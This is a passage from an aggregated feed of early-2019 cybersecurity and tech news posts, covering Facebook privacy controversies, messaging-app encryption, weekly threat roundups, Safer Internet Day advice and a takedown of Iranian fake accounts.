Google yourself, restrict info. Google yourself to see if there are any digital breadcrumbs that give away your home address or phone number. If possible, delete or revise that info. Likewise, go through your social accounts and remove any personal information you’ve shared in the past. Digital stalking is a risk for people who date online so turn off GPS on your dating apps and make sure your profile information is vague. Even if you get comfortable online with others, never get too comfortable since apps have privacy loopholes that can easily be exploited by hackers.

Take solid precautions. Enlist at least one friend as your dating safety pal. This will be the person who knows where you are going, who you will be with, and the background on the person you are meeting. Ask that person to check in with you during the date and carry pepper spray or a taser for physical protection. Go the extra step and turn on your Friend Finder or a location app that allows safety friend to track your whereabouts during a date.

*Names have been changed

The post Valentine’s Alert: Don’t Let Scammers Break Your Heart or Your Bank Account appeared first on McAfee Blogs.

Facebook Acquires Visual Shopping Startup To Bolster AI Work

Facebook says it has acquired visual shopping and artificial intelligence startup GrokStyle in a move to bolster the social-media company's own AI work. From a report: GrokStyle's technology, which was integrated into Ikea's mobile app, was simple in practice. A user takes a picture of a piece of furniture and the technology would match it to similar products that could be purchased online. On its website, GrokStyle said it is "winding down" its business, but that it is "moving on as a team" along with its technology. The company didn't disclose it's joining Facebook.

Read more of this story at Slashdot.

Cyber Security Week in Review (Feb. 8)


Welcome to this week's Cyber Security Week in Review, where Cisco Talos runs down all of the news we think you need to know in the security world. For more news delivered to your inbox every week, sign up for our Threat Source newsletter here.

Top headlines this week


  • Attackers continue to utilize a security hole in GoDaddy.com domains. The flaw allows unauthenticated users to send malicious emails via legitimate, dormant domains. Most recently, a group of attackers sent out a series of sextortion and bomb threat emails, as outlined in a report by Cisco Talos. GoDaddy is the world’s largest domain name registrar.
  • Email spammers are taking advantage of a little-known Gmail feature that allows them to grow their reach. They can create so-called “dot emails,” which places a period between each letter in their domain name. If the attackers are able to use a seemingly legitimate domain, they can then add dots to that domain and still control the emails, allowing them to send out more spam. 
  • Facebook is stepping up its crackdown on fake accounts. The social media site took down thousands of pages and profiles posting malicious content. The pages originated from Iran and Indonesia. Earlier this month, it also removed Russian- and Philipino-backed, politically motivated pages.

From Talos


  • An evolution of the LuckyCat malware, known as “ExileRAT,” is targeting Tibetan users. Talos recently discovered an email campaign that sent malicious documents to members of a mailing list related to the Tibetan government-in-exile. Based on the malware’s capabilities, it’s believed the attackers aim to spy on their victims.
  • Cryptocurrency miners, trojans lead malware in 2018. Talos this week published a roundup of the SNORT® rules that triggered the most last year. Rules that helped protect users against miners and trojans were among the most used.

Malware roundup


  • A new backdoor is targeting Linux systems. Known as “SpeakUp,” the remote access trojan allows attackers to gain boot persistence by modifying the local cron utility, run shell commands and execute downloaded files.
  • Banking customers in the U.K. fell victim to SS7 attacks that drained their accounts. Attackers were able to exploit SS7 to intercept users’ phone calls and text messages, eventually being able to steal banking credentials. The U.K.’s Metro Bank was specifically targeted in the most recent campaign. 
  • New variants of DanaBot are targeting users in Europe. Machines already infected with DanaBot received disguised “updates” with the new variants, and attackers also sent out malspam to Polish users. These versions use a different command and control communication method than the original version from 2018. 

The rest of the news


  • Mozilla is working on a new feature for Firefox to protect against side-channel attacks. The new tool aims to be an improved version of Google Chrome’s Site Isolation feature, which helps browsers block potential side-channel attacks.
  • The U.S. Department of Justice and Department of Homeland Security completed an election security report. The study, ordered by the White House, looks at whether the 2018 midterm elections were influenced by foreign interference. It’s unclear whether the report will ever be made public. 
  • Google patched a critical vulnerability in Android devices as part of its February security update. Attackers could use a specially crafted PNG image to completely take over the victim’s mobile device. Google says there’s no evidence of the bug being exploited in the wild.


Merging Facebook Messenger, WhatsApp, and Instagram: a technical, reputational hurdle

Secure messaging is supposed to be just that—secure. That means no backdoors, strong encryption, private messages staying private, and, for some users, the ability to securely communicate without giving up tons of personal data.

So, when news broke that scandal-ridden, online privacy pariah Facebook would expand secure messaging across its Messenger, WhatsApp, and Instagram apps, a broad community of cryptographers, lawmakers, and users asked: Wait, what?

Not only is the technology difficult to implement, the company implementing it has a poor track record with both user privacy and online security.

On January 25, the New York Times reported that Facebook CEO Mark Zuckerberg had begun plans to integrate the company’s three messaging platforms into one service, allowing users to potentially communicate with one another across its separate mobile apps. According to the New York Times, Zuckerberg “ordered that the apps all incorporate end-to-end encryption.”

The initial response was harsh.

Abroad, Ireland’s Data Protection Commission, which regulates Facebook in the European Union, immediately asked for an “urgent briefing” from the company, warning that previous data-sharing proposals raised “significant data protection concerns.”

In the United States, Democratic Senator Ed Markey for Massachusetts said in a statement: “We cannot allow platform integration to become privacy disintegration.”

Cybersecurity technologists swayed between cautious optimism and just plain caution.

Some professionals focused on the clear benefits of enabling end-to-end encryption across Facebook’s messaging platforms, emphasizing that any end-to-end encryption is better than none.

Former Facebook software engineer Alec Muffet, who led the team that added end-to-end encryption to Facebook Messenger, said on Twitter that the integration plan “clearly maximises the privacy afforded to the greatest [number] of people and is a good idea.”

Others questioned Facebook’s motives and reputation, scrutinizing the company’s established business model of hoovering up mass quantities of user data to deliver targeted ads.

John Hopkins University Associate Professor and cryptographer Matthew Green said on Twitter that “this move could potentially be good or bad for security/privacy. But given recent history and financial motivations of Facebook, I wouldn’t bet my lunch money on ‘good.’”

On January 30, Zuckerberg confirmed the integration plan during a quarterly earnings call. The company hopes to complete the project either this year or in early 2020.

It’s going to be an uphill battle.

Three applications, one bad reputation

Merging three separate messaging apps is easier said than done.

In a phone interview, Green said Facebook’s immediate technological hurdle will be integrating “three different systems—one that doesn’t have any end-to-end encryption, one where it’s default, and one with an optional feature.”

Currently, the messaging services across WhatsApp, Facebook Messenger, and Instagram have varying degrees of end-to-end encryption. WhatsApp provides default end-to-end encryption, whereas Facebook Messenger provides optional end-to-end encryption if users turn on “Secret Conversations.” Instagram provides no end-to-end encryption in its messaging service.

Further, Facebook Messenger, WhatsApp, and Instagram all have separate features—like Facebook Messenger’s ability to support more than one device and WhatsApp’s support for group conversations—along with separate desktop or web clients.

Green said to imagine someone using Facebook Messenger’s web client—which doesn’t currently support end-to-end encryption—starting a conversation with a WhatsApp user, where encryption is set by default. These lapses in default encryption, Green said, could create vulnerabilities. The challenge is in pulling together all those systems with all those variables.

“First, Facebook will have to likely make one platform, then move all those different systems into one somewhat compatible system, which, as far as I can tell, would include centralizing key servers, using the same protocol, and a bunch of technical development that has to happen,” Green said. “It’s not impossible. Just hard.”

But there’s more to Facebook’s success than the technical know-how of its engineers. There’s also its reputation, which, as of late, portrays the company as a modern-day data baron, faceplanting into privacy failure after privacy failure.

After the 2016 US presidential election, Facebook refused to call the surreptitious collection of 50 million users’ personal information a “breach.” When brought before Congress to testify about his company’s role in a potential international disinformation campaign, Zuckerberg deflected difficult questions and repeatedly claimed the company does not “sell” user data to advertisers. But less than one year later, a British parliamentary committee released documents that showed how Facebook gave some companies, including Airbnb and Netflix, access to its platform in exchange for favors—no selling required.

Five months ago, Facebook’s Onavo app was booted from the Apple App Store for gathering app data, and early this year, Facebook reportedly paid users as young as 13-years-old to install the “Facebook Research” app on their own devices, an app intended strictly for Facebook employee use. Facebook pulled the app, but Apple had extra repercussions in mind: It removed Facebook’s enterprise certificate, which the company relied on to run its internal developer apps.

These repeated privacy failures are enough for some users to avoid Facebook’s end-to-end encryption experiment entirely.

“If you don’t trust Facebook, the place to worry is not about them screwing up the encryption,” Green said. “They want to know who’s talking to who and when. Encryption doesn’t protect that at all.”

If not Facebook, then who?

Reputationally, there are at least two companies that users look to for both strong end-to-end encryption and strong support of user privacy and security—Apple and Signal, which respectively run the iMessage and Signal Messenger apps.

In 2013, Open Whisper Systems developed the Signal Protocol. This encryption protocol provides end-to-end encryption for voice calls, video calls, and instant messaging, and is implemented by WhatsApp, Facebook Messenger, Google’s Allo, and Microsoft’s Skype to varying degrees. Journalists, privacy advocates, cryptographers, and cybersecurity researchers routinely praise Signal Messenger, the Signal Protocol, and Open Whisper Systems.

“Use anything by Open Whisper Systems,” said former NSA defense contractor and government whistleblower Edward Snowden.

“[Signal is] my first choice for an encrypted conversation,” said cybersecurity researcher and digital privacy advocate Bruce Schneier.

Separately, Apple has proved its commitment to user privacy and security through statements made by company executives, updates pushed to fix vulnerabilities, and legal action taken in US courts.

In 2016, Apple fought back against a government request that the company design an operating system capable of allowing the FBI to crack an individual iPhone. Such an exploit, Apple argued, would be too dangerous to create. Earlier last year, when an American startup began selling iPhone-cracking devices—called GrayKey—Apple fixed the vulnerability through an iOS update.

Repeatedly, Apple CEO Tim Cook has supported user security and privacy, saying in 2015: “We believe that people have a fundamental right to privacy. The American people demand it, the constitution demands it, morality demands it.”

But even with these sterling reputations, the truth is, cybersecurity is hard to get right.

Last year, cybersecurity researchers found a critical vulnerability in Signal’s desktop app that allowed threat actors to obtain users’ plaintext messages. Signal’s developers fixed the vulnerability within a reported five hours.

Last week, Apple’s FaceTime app, which encrypts video calls between users, suffered a privacy bug that allowed threat actors to briefly spy on victims. Apple fixed the bug after news of the vulnerability spread.

In fact, several secure messaging apps, including Telegram, Viber, Confide, Allo, and WhatsApp have all reportedly experienced security vulnerabilities, while several others, including Wire, have previously drawn ire because of data storage practices.

But vulnerabilities should not scare people from using end-to-end encryption altogether. On the contrary, they should spur people into finding the right end-to-end encrypted messaging app for themselves.

No one-size-fits-all, and that’s okay

There is no such thing as a perfect, one-size-fits-all secure messaging app, said Electronic Frontier Foundation Associate Director of Research Gennie Gebhart, because there’s no such thing as a perfect, one-size-fits-all definition of secure.

“In practice, for some people, secure means the government cannot intercept their messages,” Gebhart said. “For others, secure means a partner in their physical space can’t grab their device and read their messages. Those are two completely different tasks for one app to accomplish.”

In choosing the right secure messaging app for themselves, Gebhart said people should ask what they need and what they want. Are they worried about governments or service providers intercepting their messages? Are they worried about people in their physical environment gaining access to their messages? Are they worried about giving up their phone number and losing some anonymity?

In addition, it’s worth asking: What are the risks of an accident, like, say, mistakenly sending an unencrypted message that should have been encrypted? And, of course, what app are friends and family using?

As for the constant news of vulnerabilities in secure messaging apps, Gebhart advised not to overreact. The good news is, if you’re reading about a vulnerability in a secure messaging tool, then the people building that tool know about the vulnerability, too. (Indeed, developers fixed the majority of the security vulnerabilities listed above.) The best advice in that situation, Gebhart said, is to update your software.

“That’s number one,” Gebhart said, explaining that, though this line of defense is “tedious and maybe boring,” sometimes boring advice just works. “Brush your teeth, lock your door, update your software.”

Cybersecurity is many things. It’s difficult, it’s complex, and it’s a team sport. That team includes you, the user. Before you use a messenger service, or go online at all, remember to follow the boring advice. You’ll better secure yourself and your privacy.

The post Merging Facebook Messenger, WhatsApp, and Instagram: a technical, reputational hurdle appeared first on Malwarebytes Labs.

Facebook Ordered To Stop Combining WhatsApp and Instagram Data Without Consent in Germany; Company Says It Needs That Data To Fight Terrorism and Child Abuse

Facebook has been ordered to curb its data collection practices in Germany after a landmark ruling on Thursday that the world's largest social network abused its market dominance to gather information about users without their consent. From a report: The order applies to data collected by Facebook-owned platforms like WhatsApp and Instagram, but also third-party sources that Facebook uses to flesh out its advertising profiles, including those of non-users. The Bundeskartellamt, or Federal Cartel Office (FCO), has given Facebook one month to appeal the landmark decision, which comes after a three-year investigation. If the appeal fails, the tech company will have to ensure these data sources are not combined without consent within the next four months. Although the ruling only applies within Germany, the decision could influence regulators in other countries. Gizmodo adds: Facebook insists that combining all of that data is actually great. In fact, the company says, it's keeping everyone safe from stuff like terrorism and child abuse. From Facebook's statement this morning: "Facebook has always been about connecting you with people and information you're interested in. We tailor each person's Facebook experience so it's unique to you, and we use a variety of information to do this -- including the information you include on your profile, news stories you like or share and what other services share with us about your use of their websites and apps. Using information across our services also helps us protect people's safety and security, including, for example, identifying abusive behavior and disabling accounts tied to terrorism, child exploitation and election interference across both Facebook and Instagram."

Read more of this story at Slashdot.

Historical OSINT – Profiling a Typosquatted Facebook and Twitter Impersonating Fraudulent and Malicious Domains Portfolio

With cybercriminals continuing to populate the cybercrime ecosystem with hundreds of malicious released including a variety of typosquatted domains it shouldn't be surprising that hundreds of thousands of users continue falling victim to fraudulent and malicious malware and exploits serving schemes. In this post I'll profile a currently active fraudulent and malicious typosquatted domain

Phishers Leveraging Google Translate to Target Google and Facebook Users

Phishers are leveraging Google Translate in their attempts to steal the login credentials for users’ Google and Facebook accounts. Larry Cashdollar, a member of Akamai’s Security Intelligence Response Team (SIRT), received an email in early 2019 informing him that someone had accessed his Google account from a new Windows device. On his phone, the email […]… Read More

The post Phishers Leveraging Google Translate to Target Google and Facebook Users appeared first on The State of Security.

How to Delete Accidentally Sent Messages, Photos on Facebook Messenger

Ever sent a message on Facebook Messenger then immediately regretted it, or an embarrassing text to your boss in the heat of the moment at late night, or maybe accidentally sent messages or photos to a wrong group chat? Of course, you have. We have all been through drunk texts and embarrassing photos many times that we later regret sending but are forced to live with our mistakes. Good news,

Five in a Row: S&P 500 Extends Rally on Huge Earnings Beats from Estee Lauder, Ralph Lauren

U.S. stocks extended their rally on Tuesday, as positive earnings surprises from a pair of discretionary companies propelled the S&P 500 to two-month highs. Crypto coins pivoted slightly lower in afternoon trading, with Stellar, IOTA and Tron losing strength. Rally Continues The large-cap S&P 500 Index rose 0.5% to 2,737.70, its highest settlement since early […]

The post Five in a Row: S&P 500 Extends Rally on Huge Earnings Beats from Estee Lauder, Ralph Lauren appeared first on Hacked: Hacking Finance.

Facebook Now Lets Everyone Unsend Messages For 10 Minutes

Facebook has finally made good on its promise to let users unsend chats after TechCrunch discovered Mark Zuckerberg had secretly retracted some of his Facebook Messages from recipients. From a report: Today Facebook Messenger globally rolls out "Remove for everyone" to help you pull back typos, poor choices, embarrassing thoughts, or any other message. For up to 10 minutes after sending a Facebook Message, the sender can tap on it and they'll find the delete button has been replaced by "Remove for you", but there's now also a "Remove for everyone" option that pulls the message from recipients' inboxes. They'll see an alert that you removed a message in its place, and can still flag the message to Facebook who'll retain the content briefly to see if its reported. The feature could make people more comfortable having honest conversations or using Messenger for flirting since they can second guess what they send, but it won't let people change ancient history. The company abused its power by altering the history of Zuckerberg's Facebook's messages in a way that email or other communication mediums wouldn't allow.

Read more of this story at Slashdot.

Facebook’s Plans to Merge Messaging Platforms: What This Means for Online Safety

Integration: it seems to be all the rage. As technology becomes more sophisticated, we sprint to incorporate these new innovations into our everyday lives. But as we celebrate Safer Internet Day, one can’t help but wonder, is all integration good when it comes to information shared online? Major privacy concerns have been raised surrounding Facebook’s recent plans to merge Messenger, WhatsApp, and Instagram. This integration will allow cross-messaging between the three platforms (which will all still operate as standalone apps), so users could talk to their Messenger-only friends without leaving WhatsApp.

While Facebook’s plans to merge the messaging platforms are not yet finalized, the company is in the process of rebuilding the underlying infrastructure so that users who might utilize only one of the apps will be able to communicate with others within the company’s ecosystem. Facebook plans to include end-to-end encryption for the apps, ensuring that only the participants of a conversation can view the messages being sent. By allowing each app to speak to one another across platforms, Facebook hopes users become more engaged and use this as their primary messaging service.

But Facebook’s messaging changes have greater implications for online safety as consumers become more protective of their data. For example, WhatsApp only requires a phone number to sign up for the app while Facebook asks users to verify their identities. Will this force more data to be shared with WhatsApp, or will its encryption become less secure? While nothing has been finalized, it’s important for users to think about how the information they share online could be affected by this merge.

Although the internet has paved the way for advancements in social media and technology in general, users need to make sure they’re aware of the potential risks involved. And while this merge hasn’t happened yet, Safer Internet Day helps remind us to make good choices when it comes to browsing online. Following these tips can help keep you and your data safe and secure:

  • Get selective about what you share. Although social media is a great way to keep your friends and family in the loop on your daily life, be conservative about the information you put on the internet. Additionally, be cautious of what you send through messaging platforms, especially when it comes to your personally identifiable information.
  • Update your privacy settings. To make sure that you’re sharing your status with just your intended audience, check your privacy settings. Choose which apps you wish to share your location with and turn your profiles to private if you don’t want all users to have access to your information.
  • Keep your apps up-to-date. Keeping your social media apps updated can prevent exposure to threats brought on by software bugs. Turn on automatic updates so you always have the latest security patches, and make sure that your security software is set to run regular scans.
  • Click with caution. Cybercriminals can leverage social media messaging to spread phishing links. Don’t interact with users or messages that seem suspicious and keep your guard up by blocking unfamiliar users who try to send you sketchy content.
  • Stay secure while you browse online. Security solutions like McAfee WebAdvisor can help block malware and phishing sites if you accidentally click on a malicious link. This can help protect you from potential threats when you access your social channels from a desktop or laptop.

And, as always, stay on top of the latest consumer and mobile security threats by following @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Facebook’s Plans to Merge Messaging Platforms: What This Means for Online Safety appeared first on McAfee Blogs.

Safer Internet Day 2019 – Together for a Better Internet

What You Can Do Today to Help Create a Better Internet

 

Today is Safer Internet Day (SID) – an annual worldwide event to encourage us all to work together to create a better internet. Celebrated globally in over 130 countries, SID is an opportunity for millions of people worldwide to come together to inspire positive change and raise awareness about the importance of online safety.

The theme for 2019 is: ‘Together for a Better Internet’ which I believe is a timely reminder of the importance of us all working together if we are serious about making the internet a safer place. Whether we are parents, carers, teachers or just avid users, we all have a part to play.

The 4R’s of Online Safety

In order to make a positive change to our online world, this year we are being encouraged to focus on four critical skills that many experts believe will help us all (especially our kids) better navigate the internet and create a more positive online environment. Let’s call them the 4R’s of online safety: Respect, Responsibility, Reasoning and Resilience. So, here is my advice on what we can do to try and incorporate these four important skills into our family’s digital lives

  1. Respect – ‘I treat myself and others the way I like to be treated’

I firmly believe that having respect for others online is critical if we are going to foster a safer and more supportive internet for our children and future generations. While many parents realise that our constant reminders about the importance of good manners and respect must also now be extended to include the online world, not everyone is on the same page.

Keyboard warriors who fire off abusive comments online, or harass and troll others clearly do not have any notion of online respect. Online actions can have serious real-world implications. In fact, online actions can often have more significant implications as the dialogue is not just contained to a few, rather it is witnessed by everyone’s online friends which could stretch into the 1000’s. Such public exchanges then create the opportunity for commentary which often further magnifies the hurt and fallout.

It is therefore essential that we have very direct conversations with our children about what is and isn’t appropriate online. And if there is even any confusion, always revert to one of my favourite lessons from my Sunday School days: treat others how you would like to be treated yourself.

  1. Responsibility – ‘I am accountable for my actions and I take a stand when I feel something is wrong’

In my opinion, teaching our kids online responsibility is another important step in making the internet a better place. Ensuring our kids understand that they are not only responsible but accountable for their behaviour is essential. If they harass or bully others online, or are involved in sending inappropriate pics, there are consequences that could quite possible include interactions with the police department.

But being responsible online also means getting involved if you feel something isn’t right. Whether a mate is on the receiving end of online harassment or a cruel joke, getting involved and telling the perpetrator that their behaviour ‘isn’t cool’ is essential.

  1. Reasoning – ‘I question what is real’

Teaching our kids to think critically is an essential survival skill for our kids in our content-driven online world. We need our kids to question, analyse and verify online content. They need to be able to identify reputable and credible sources and think carefully before they share and digest information.

The best thing we can do as parents is challenge our kids and get them thinking! If for example, your child is researching online for a school assignment then get them thinking. Ask them what agenda the author of the article has. Ask them whether there is a counter argument to the one laid out in the article. Ask them whether the source sharing the information is trustworthy. The aim is to teach them to question and not take anything they find online at face value.

  1. Resilience – ‘I get back up from tough situations’

Unfortunately, the chances that your child will experience some challenges online is quite high. Whether someone posts a mean comment, they are harassed, or worst case, cyberbullied – these nasty online interactions can really hurt.

Ensuring your kids know that they can come to you about any issue they experience is essential. And you need to repeat this to them regularly, so they don’t forget! And if your child does come to you with a problem they experienced online, the worst thing you can do is threaten to disconnect them. If you do this, I guarantee you that they will never share anything else with you again.

In 2014, Parent Zone, one of the UK’s leading family digital safety organisations collaborated with the Oxford Internet Institute to examine ways to build children’s online resilience. The resulting report, A Shared Responsibility: Building Children’s Online Resilience, showed that unconditional love and respect from parents, a good set of digital skills plus the opportunity for kids to take risks and develop strategies in the online world – without being overly micro-managed by their parents – were key to building online resilience.

So, love them, educate them and give them some independence so they can start to take some small risks online and start developing resilience.

What Can You Do this Safer Internet Day?

Why not pledge to make one small change to help make the internet a better place this Safer Internet Day? Whether it’s modelling online respect, reminding your kids of their online responsibilities, challenging them to demonstrate reasoning when assessing online content or working with them to develop online resilience, just a few small steps can make a positive change.

 

 

 

 

 

The post Safer Internet Day 2019 – Together for a Better Internet appeared first on McAfee Blogs.

Facebook’s New Privacy Hires

The Wired headline sums it up nicely -- "Facebook Hires Up Three of Its Biggest Privacy Critics":

In December, Facebook hired Nathan White away from the digital rights nonprofit Access Now, and put him in the role of privacy policy manager. On Tuesday of this week, lawyers Nate Cardozo, of the privacy watchdog Electronic Frontier Foundation, and Robyn Greene, of New America's Open Technology Institute, announced they also are going in-house at Facebook. Cardozo will be the privacy policy manager of WhatsApp, while Greene will be Facebook's new privacy policy manager for law enforcement and data protection.

I know these people. They're ethical, and they're on the right side. I hope they continue to do their good work from inside Facebook.

A week in security (January 28 – February 3)

Last week, we ran another in our interview with a malware hunter series, explained a FaceTime vulnerability, and took a deep dive into a new stealer. We also threw some light  on a Houzz data breach, and what exactly happened between Apple and Facebook.

Other cybersecurity news

  • Kwik Fit hit by malware: Car service specialist runs into trouble when systems go offline. (Source: BBC)
  • Mozilla publishes tracking policy: Mozilla fleshes out out their vision of what is and isn’t acceptable in tracking land. (Source: Mozilla)
  • Distracting smart speakers: How you can effectively drown out your smart speaker with a bit of distraction. (Source: The Register)
  • Privacy attack aimed at 3/4/5G users: Theoretical fake mobile towers are back in business, with an investment in monitoring device owner activities. (Source: Help Net Security)
  • How my Instagram was hacked: A good warning about the perils of password reuse. (Source: Naked Security)
  • Social media identity thieves: Scammers will stop at nothing to pull some heartstrings and make a little money in the bargain. (Source: ABC news)
  • Another smart home hacked: A family recounts their horror at seeing portions of their home cut open for someone’s amusement. (Source: Komando)
  • Facebook mashup: Plans to combine Whatsapp, Instagram, and Facebook Messenger are revealed with security questions raised. (Source: New York Times)
  • Phishing attacks continue to rise: Worrying stats via security experts polled who agree in large numbers that phishing is at the same level or higher than it was previously. (Source: Mashable)
  • Researchers discover malware-friendly hosting service: After a spike in infections, researchers track things back to a host that looked like a “hornet’s nest of malware.” (Source: TechCrunch)

Stay safe, everyone!

The post A week in security (January 28 – February 3) appeared first on Malwarebytes Labs.

Jack Dorsey Tells Joe Rogan Bitcoin Will “Probably” Become Internet’s Native Currency

Twitter CEO Jack Dorsey talked up bitcoin in a big way this weekend when he appeared on the highly coveted Joe Rogan Experience. The long-time advocate of cryptocurrency said bitcoin will “probably” become the internet’s native currency in ten years’ time. Internet’s Native Currency Appearing on episode 1236 of the Joe Rogan Experience on Saturday, […]

The post Jack Dorsey Tells Joe Rogan Bitcoin Will “Probably” Become Internet’s Native Currency appeared first on Hacked: Hacking Finance.

Attorneys General in Six States Are Now Investigating Facebook’s Data Practices, Report Says

At least six state attorneys general have launched investigations into Facebook, Bloomberg is reporting. From a report: Two distinct groups have formed, according to Bloomberg's report: Pennsylvania and Illinois have joined Connecticut in an investigation of "existing allegations," though the report does not mention what those are. Officials in New York, New Jersey, and Massachusetts, "which were already known to be probing Facebook, are seeking to uncover any potential unknown violations," a source told the news agency. Bloomberg reported that a Facebook vice president of public policy, Will Castleberry, spun the news as the attorneys general just wanting to help Facebook out by suggesting new privacy initiatives or something. "We're having productive conversations with attorneys general on this important topic," Castleberry wrote in an email to Bloomberg. "Many officials have approached us in a constructive manner, focused on solutions that ensure all companies are protecting people's information, and we look forward to continuing to work with them."

Read more of this story at Slashdot.

Facebook Brings Express Wi-Fi To Ghana, Quietly Expands Free Basics To Morocco and Laos

More than a year after Facebook commercially launched Express Wi-Fi in five markets, it is ready to bring the connectivity service to the sixth: Ghana. From a report: In partnership with telecom operator Vodafone Ghana, Facebook today launched Express Wi-Fi, part of Internet.org initiative, in the suburban communities of the Western African nation. The service, available locally in Nima, James Town, Kanda, Pig Farm, and Abossey Okine in the capital city Accra, will aim to offer "carrier-grade Wi-Fi" to people living in some remote communities that lack fiber optic cables. Ever since India booted Free Basics in early 2016, Facebook has seemingly grown cautious about its connectivity efforts. The company has stopped updating the social media page and press page of Internet.org. Last year, we learned that Facebook had quietly pulled Internet.org from a handful of emerging markets. In recent months, however, it has quietly expanded Internet.org to two new markets -- Morocco (in North Africa) and Laos (in Southeast Asia).

Read more of this story at Slashdot.

Apple Restores Facebook And Google Internal iOS Apps After Brief Punishment

The clashes between Facebook and Apple, and Google and Apple have made it to the news recently. Due to violations

Apple Restores Facebook And Google Internal iOS Apps After Brief Punishment on Latest Hacking News.

Cyber Security Week in Review (Feb. 1)

Welcome to this week's Cyber Security Week in Review, where Cisco Talos runs down all of the news we think you need to know in the security world. For more news delivered to your inbox every week, sign up for our Threat Source newsletter here.

Top headlines this week

  • Apple revoked a set of developer tools from Facebook. The two tech companies got into a tug-of-war this week over a Facebook program that came to light where they paid users to install a VPN on their mobile devices. Facebook would then track users’ habits via the VPN. Facebook has now ended that program.
  • Apple temporarily disabled its group FaceTime service as it fixes a vulnerability. If exploited, an attacker could potentially listen in on conversations via Apple devices’ microphones even if the user doesn’t answer a FaceTime call. Apple’s slow response to this bug has prompted New York’s attorney general to launch an investigation.
  • The U.S. filed several criminal charges against Chinese tech company Huawei. One indictment accused Huawei of attempting to steal trade secrets from mobile company T-Mobile, while another says the company worked to bypass American sanctions against Iran.

From Talos

  • Attackers are utilizing a fake job posting from Cisco Korea to infect users. Based on our research, we believe this is the latest in a long string of attacks from the same threat actor.
  • There are multiple vulnerabilities in ACD Systems' Canvas Draw 5. The vulnerable component of Canvas Draw 5 lies in the handling of TIFF and PCX images. Snort rules 39593 - 39596, 39599 - 39632, 47336, 47337 can help protect you from the exploitation of these vulnerabilities.
  • Python.org contains an exploitable denial-of-service vulnerability in its X509 certificate parser. A specially crafted X509 certificate can cause a NULL pointer to dereference, resulting in a denial of service. Snort rules 48854 and 48855 can protect you from the exploitation of this vulnerability. 
  • Talos discovered two vulnerabilities that could allow remote code execution and memory disclosure at the kernel level in WIBU-SYSTEMS WibuKey. WibuKey is a USB key designed to protect software and intellectual properties. Snort rules 47750 and 47751 can protect you from the exploitation of these vulnerabilities. 

Malware roundup

  • The FormBook malware is back, this time targeting retail and hospitality companies. The information-stealer first appeared in 2016, and its use has recently risen through a new malware-hosting service.
  • The FBI and Air Force are working together to dismantle a North Korean botnet. Joanap is a remote access tool believed to be associated with the Lazarus Group APT. Snort rule 46885 can prevent Joanap from making an outbound connection.
  • A new cryptocurrency malware is targeting Macs. A variant of OSX.DarthMiner, the malware steals browser cookies and saved passwords in the Google Chrome web browser. 
  • American and Belgian authorities shut down an illegal online marketplace. xDedic, a website that concealed the location of its servers and was often used to sell personal information stolen in cyber attacks, is responsible for roughly $68 million of fraud.

The rest of the news

  • Google removed several data collection apps from the iOS App Store. The apps collected data from users’ phones, browsers and routers with their consent. In exchange, Google sent gift cards to the users. However, they did not properly operate under Apple’s developer enterprise program.
  • The United Arab Emirates has gathered a group of hackers to track adversaries of their government. Many of the members are former U.S. National Security Agency hackers. 
  • A group of 2.2 billion login credentials is circulating among hacking groups. This trove of information is part of a smaller collection that was uncovered by a security researcher earlier this year.
  • A distributed denial-of-service attack recently broke the record for packets sent per second. Security firm Imperva says they recently stopped an attack against their client that crossed the 500 million packets per second mark. 
  • Airbus employees’ data was accessed as the result of a recent data breach. The airline says there was no impact to their commercial operations or intellectual property.
  • Chrome and Firefox fixed several security flaws in the latest versions of their browsers. Chrome 72 fixed 58 CVEs, including one that was rated “critical,” while Firefox patched seven CVEs, including three “critical” ones. 

Security Affairs: Facebook dismantled a vast manipulation campaign tied to Iran

Facebook took down hundreds of fake accounts from Iran that were involved in a vast manipulation campaign active in more than 20 countries.

Facebook took down 783 inauthentic accounts, pages and groups from Iran that were involved in a vast manipulation campaign active in more than 20 countries.

“The world’s biggest social network said it removed 783 pages, groups and accounts “for engaging in coordinated inauthentic behavior tied to Iran.“” reported the AFP Press.

Nathaniel Gleicher, head of cybersecurity policy at Facebook, revealed that the pages were promoting Iranian interest in tens of countries, threat actors used fake identities as residents of those nations,

The pages were part of a campaign to promote Iranian interests in various countries by creating fake identities as residents of those nations, according to a statement by Nathaniel Gleicher, head of cybersecurity policy at Facebook.

Iran manipulation campaign Facebook

Facebook continues its efforts to prevent manipulation of its platform for fraudulent activities.

“We are constantly working to detect and stop this type of activity because we don’t want our services to be used to manipulate people,” Gleicher
declared.

“We’re taking down these pages, groups and accounts based on their behavior, not the content they post. In this case, the people behind this activity coordinated with one another and used fake accounts to misrepresent themselves, and that was the basis for our action.”

Threat actors behind the campaign represented themselves as locals and posted news stories on current events. The accounts were used to discuss about topics of interest for Iranians, such as Israel-Palestine relations and the conflicts in Syria and Yemen.

“This morning we removed 783 Pages, groups and accounts for engaging in coordinated inauthentic behavior tied to Iran. There were multiple sets of activity, each localized for a specific country or region, including Afghanistan, Albania, Algeria, Bahrain, Egypt, France, Germany, India, Indonesia, Iran, Iraq, Israel, Libya, Mexico, Morocco, Pakistan, Qatar, Saudi Arabia, Serbia, South Africa, Spain, Sudan, Syria, Tunisia, US, and Yemen.” wrote Nathaniel Gleicher.

“The Page administrators and account owners typically represented themselves as locals, often using fake accounts, and posted news stories on current events. This included commentary that repurposed Iranian state media’s reporting on topics like Israel-Palestine relations and the conflicts in Syria and Yemen, including the role of the US, Saudi Arabia, and Russia.”

In some cases, the activity carried out by the fake accounts date back to 2010.

Facebook pointed out that although threat actors attempted to hide their identities, the manual review of the activities associated with these accounts allowed them to identify the coordinated inauthentic behavior from Iran.

The campaign operated by threat actors as early as 2010 involved 262 pages, 356 accounts, and three groups on Facebook, as well as 162 accounts on Instagram.

According to Facebook, about 2 million accounts followed at least one of the above pages, about 1,600 accounts joined at least one of the groups, and more than 254,000 accounts followed at least one of these Instagram accounts.

The social network giant reported that operators spent less than $30,000 in ads on Facebook and Instagram, they were paid for primarily in US dollars, UK pounds, Canadian dollars, and euros

“We identified some of these accounts through our continued investigation into Iranian coordinated inauthentic behavior we found and removed last year.” concludes Gleicher.

“Our investigation was aided by open source reporting and information provided to us by our industry peers. We have shared information about our investigation with US law enforcement, the US Congress, and policymakers in impacted countries. “

Pierluigi Paganini

(SecurityAffairs – Facebook, manipulation campaign)

The post Facebook dismantled a vast manipulation campaign tied to Iran appeared first on Security Affairs.



Security Affairs

Facebook dismantled a vast manipulation campaign tied to Iran

